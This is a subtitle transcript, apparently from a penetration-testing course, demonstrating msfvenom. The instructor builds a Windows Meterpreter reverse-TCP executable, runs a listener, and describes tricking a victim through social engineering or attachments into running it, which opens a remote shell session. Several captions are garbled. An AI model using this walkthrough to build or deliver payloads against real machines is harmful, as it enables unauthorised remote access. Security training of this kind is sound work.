WEBVTT

00:01.320 --> 00:08.330
Hello. In the previous few videos we have discussed the need for creating custom payloads, and we have

00:08.610 --> 00:16.570
seen that we had msfpayload and msfencode, which have been replaced by msfvenom.

00:16.650 --> 00:19.250
This video discusses msfvenom.

00:19.450 --> 00:22.830
Now we will talk about the introduction to msfvenom,

00:22.830 --> 00:28.080
the advantages of using msfvenom, and some common command-line usage of the tool.

00:28.400 --> 00:32.190
So msfvenom is a combination of msfpayload and msfencode.

00:32.250 --> 00:37.980
It combines both of these tools into a single framework instance. For people who have been working on Metasploit for

00:37.980 --> 00:39.040
a long time.

00:39.390 --> 00:44.730
they know that msfpayload and msfencode had been in service to the hacking community for

00:44.730 --> 00:47.660
almost 10 years before it was

00:47.850 --> 00:51.450
decided that msfvenom would replace them.

00:51.480 --> 00:59.640
And this eventually happened: msfvenom has replaced both msfpayload and msfencode, in June 2015. Let's see

01:00.030 --> 01:02.310
the advantages of using msfvenom.

01:02.380 --> 01:09.390
So, one thing: instead of having two different tools for the purpose, it has standardized command line

01:09.390 --> 01:10.290
options.

01:10.410 --> 01:17.130
So using msfvenom is much simpler as compared to using the two separate tools.

01:17.210 --> 01:19.950
And it has a wide range of options available.

01:20.040 --> 01:25.920
I am going to quickly move on to my Kali machine and see how we can use

01:26.250 --> 01:27.800
msfvenom.

01:27.920 --> 01:29.560
So this is my Kali machine.

01:29.660 --> 01:33.340
And over here I have msfconsole running.

01:33.370 --> 01:34.310
But.

01:34.760 --> 01:41.570
I'm sure you remember how to start the PostgreSQL service, initialize the database, and then run the msfconsole

01:41.630 --> 01:46.070
command to get msfconsole running. Now open a new terminal

01:48.760 --> 01:53.280
and type msfvenom -h for help.

01:53.460 --> 01:59.190
So for using msfvenom you don't have to open up msfconsole if you're just concentrating

01:59.190 --> 02:05.220
on creating payloads; msfvenom is a standalone payload generator.

02:05.280 --> 02:08.920
It is the replacement for msfpayload and msfencode.

02:09.040 --> 02:13.270
And now the options available here are these.

02:13.350 --> 02:17.620
So I can see the options to use with msfvenom.

02:17.760 --> 02:19.220
Using the -p option

02:19.230 --> 02:20.150
I can define the payload.

02:20.340 --> 02:25.710
I can also list a module type; the options can be payloads, encoders, nops, and all.

02:25.710 --> 02:32.420
So before I start using a payload I can see the list of payloads msfvenom supports. Moving down,

02:32.520 --> 02:35.150
I can define the output format.

02:35.160 --> 02:41.050
I can also see the list of available formats that msfvenom supports. There is something called encoders, which we will

02:41.070 --> 02:44.290
be discussing in the next video, and an option to define the architecture,

02:44.340 --> 02:50.900
the platform of the payload, and so on. The other options will be used along with the msfvenom command.

02:50.910 --> 03:00.330
So just for a quick overview, if I type in msfvenom -l platforms, it should show me

03:00.860 --> 03:06.960
a list of all the platforms supported. I need to type in the name.

03:07.020 --> 03:14.620
And I've been well then partnered by all these people nobody else.

03:14.780 --> 03:22.830
This shows the list of all platforms, so you can see the platforms listed over here include Windows, Ruby, Macintosh

03:22.860 --> 03:30.570
OS, Linux, Cisco, Solaris, and so on, and the list continues to grow.

03:30.630 --> 03:36.740
So all the common platforms which a user could be using are listed over here.

03:36.840 --> 03:47.180
If I type in msfvenom --help-formats, it should show me a list of all the available

03:47.180 --> 03:50.430
formats which msfvenom supports.

03:50.870 --> 03:52.360
So, what formats means:

03:52.460 --> 03:55.670
this would be the format in which I can create a payload.

03:55.970 --> 04:03.180
And again you can see all the most commonly used formats are supported.

04:03.220 --> 04:07.690
Now let's take a quick example to see how we can use msfvenom to create a payload,

04:07.940 --> 04:15.750
and then, once the payload gets executed, see how easily we can get a session on the machine.

04:16.070 --> 04:24.530
So to create a payload I type in msfvenom. If my target is on the platform Windows, then I would

04:24.530 --> 04:33.260
type in the architecture. I think my target's architecture is x86, so -a x86. The next option is

04:33.530 --> 04:36.440
--platform, and that would be windows,

04:36.440 --> 04:42.080
since my target system is a Windows machine. And then you need to define the payload which you want to

04:42.080 --> 04:42.470
use.

04:42.470 --> 04:50.540
So for Windows I will use windows/meterpreter/reverse_tcp.

04:50.770 --> 04:57.870
You also need to type in LHOST for the reverse connection.

04:57.950 --> 05:10.300
So LHOST is the IP address of my Kali machine (192.168.x.x). Then type in a port

05:10.310 --> 05:18.030
on which you want this connection to be established, LPORT; type in something like

05:18.250 --> 05:19.640
4444.

05:19.870 --> 05:26.680
And then I need to define the format; that would be exe because the file will be executed on the Windows

05:26.680 --> 05:27.670
machine.

05:27.670 --> 05:35.520
So once we define all these options: -a for the architecture, then platform is windows, -p for

05:35.850 --> 05:47.060
the payload, LHOST and LPORT, and -f for the format. I will save this file somewhere; I can give it a name

05:47.060 --> 05:48.860
ending in .exe.

05:48.920 --> 05:53.210
That is the output file; then press Enter.

05:53.260 --> 05:54.950
That should start the process.

05:55.020 --> 05:58.690
And my payload should be generated.

05:58.840 --> 06:03.830
It says: no encoder or badchars specified, outputting raw payload.

06:03.870 --> 06:10.580
Since I have not specified any other option beyond the platform and the arch, it just gives me the raw

06:10.670 --> 06:19.870
payload, and the size is 333 bytes. If I want to find what file type this is, then I type file and then the file

06:19.870 --> 06:21.940
name, and I can see it is an executable

06:22.080 --> 06:22.930
for MS Windows.

06:22.980 --> 06:29.240
Now the only thing that needs to be done is to somehow transfer this file to the victim machine. You can use your

06:29.240 --> 06:30.960
social engineering tricks.

06:30.970 --> 06:34.670
You can share this file on a network share.

06:34.820 --> 06:38.720
Or you can upload it on to some file hosting links.

06:38.750 --> 06:46.740
Anyhow, once the file reaches the victim machine and gets executed, you can easily get a session.

06:46.920 --> 06:51.080
Here, one more thing: before the victim opens and runs this file,

06:51.210 --> 06:54.140
You should have a handler running on the console.

06:54.140 --> 07:00.120
So what I'm doing is using the web server I have on this machine so that we can share the file over the local

07:00.510 --> 07:01.270
network.

07:01.640 --> 07:09.540
So my web server is running now; I will just move the file to the web server's folder.

07:10.340 --> 07:18.320
So once this is done, quickly move to msfconsole, and over here I need to define the handler to

07:18.320 --> 07:19.440
use.

07:19.510 --> 07:27.880
And define the handler which will be responsible for the connection that will be incoming from the victim machine.

07:28.280 --> 07:29.550
That.

07:29.950 --> 07:37.760
And here I need to define the same payload which was used for creating the binary, to be

07:37.970 --> 07:38.930
used.

07:38.990 --> 07:47.170
windows/meterpreter/reverse_tcp. Then show the options; I need to define the LHOST.

07:47.200 --> 07:59.690
So set LHOST; that would be my Kali machine's IP address, 192.168.x.x.

07:59.750 --> 08:03.420
And remember we had to change the port also.

08:03.500 --> 08:06.780
So that would be no change.

08:07.240 --> 08:15.630
So once you're done with defining things, you're ready to go; you just need to start the handler,

08:15.690 --> 08:19.840
so just type in exploit.

08:19.890 --> 08:26.790
See that the reverse handler is running and it is starting the payload handler. Now we need to make sure that the victim

08:26.790 --> 08:33.870
downloads the file and executes it, and that probably depends on how you do the social engineering with the victim.

08:33.900 --> 08:40.880
I just open the web server, my machine's IP address, in the browser; the Apache web server is already running

08:40.920 --> 08:41.520
over there.

08:41.520 --> 08:43.710
You can see here, as an example,

08:43.710 --> 08:45.950
the exe file along with some other files there,

08:46.000 --> 08:46.850
also available.

08:46.940 --> 08:48.620
I just save this file.

08:48.700 --> 08:52.500
So say part of it does say we don't have it on the computer.

08:52.500 --> 08:56.400
Now this is downloaded; let's say the user just clicks it.

08:56.430 --> 09:03.730
So I may send the file as an attachment and convince the user to download and run it.

09:03.740 --> 09:06.880
See, once I double-click on this one,

09:07.260 --> 09:14.480
you can see the handler is still running on the Kali machine.

09:14.630 --> 09:16.870
I just need to click on this.

09:16.900 --> 09:18.210
Tell us McCullen.

09:18.270 --> 09:19.530
Yes.

09:19.800 --> 09:27.750
And in the meantime you see my Kali box is sending the stage, and a Meterpreter session has been

09:27.960 --> 09:28.870
established.

09:28.920 --> 09:34.660
So I did not have to run an Nmap scan on the machine to see what is open.

09:34.710 --> 09:41.490
I did not have to find the vulnerabilities existing on it. I just had to create a payload by using

09:41.490 --> 09:48.020
msfvenom for this purpose and then send the file to the victim; somehow the victim executes the

09:48.020 --> 09:48.740
file.

09:48.790 --> 09:53.320
And if my handler is running, I get the connection.

09:53.460 --> 09:59.850
So that is the benefit of creating custom payloads: you don't have to rely on the vulnerabilities that

10:00.120 --> 10:06.100
exist on the machine. Based on what the situation is, you can choose either of the two

10:06.120 --> 10:06.890
methods.

10:06.990 --> 10:12.210
The first one is scanning the machine and finding the vulnerabilities, and the second one is

10:12.210 --> 10:18.020
obviously creating a payload, sending it to the victim, and somehow convincing them to run it.

10:18.030 --> 10:23.600
So now I can see I can run ls and get a list of all the files on the victim machine.

10:23.700 --> 10:30.480
We already looked at Meterpreter in a previous video, so you know how you can start using

10:30.480 --> 10:34.780
Meterpreter now and get more details from the victim machine.

10:34.830 --> 10:41.430
So in this video we had a quick overview of msfvenom, and we saw how we can use msfvenom to create a custom

10:41.430 --> 10:41.950
payload.

10:42.150 --> 10:44.820
In the next video we will discuss encoders.
